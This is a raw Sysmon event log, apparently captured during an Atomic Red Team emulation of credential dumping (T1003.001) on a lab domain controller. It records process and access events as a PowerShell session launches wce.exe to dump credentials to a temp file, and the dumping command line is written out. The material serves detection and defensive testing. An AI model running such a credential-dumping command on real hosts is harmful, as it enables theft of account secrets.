21:10:17.845{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt 11241100x800000000000000025458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:17.827{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe2021-06-23 21:10:17.827 10341000x800000000000000025457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.796{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-A339-60D3-5006-00000000CF01}64802868C:\Windows\system32\cmd.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.763{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=BE9387BF647993E501C5D78E49BD4AB5,SHA256=C6333C684762ED4B4129C7F9F49C88C33384B66DFB1F100E459EC6F18526DFF7,IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %temp%\wce-output.txt" 10341000x800000000000000025449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=412AD5DE910F90E69CC75E92553B7808,SHA256=13CE8C32A2329DCE6E71A268C4ABBD3E3BA2121DFFDD1786DBA1A17D29E4FE47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.749{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %%temp%%\wce-output.txt" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.577{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=254299143D15B0C3A2B9CB2B5A50D46A,SHA256=68D48FC8CF64D9FD9AB86860E8EF17A58FA5FC4A86AA6F6F187DD74CB83E1961,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 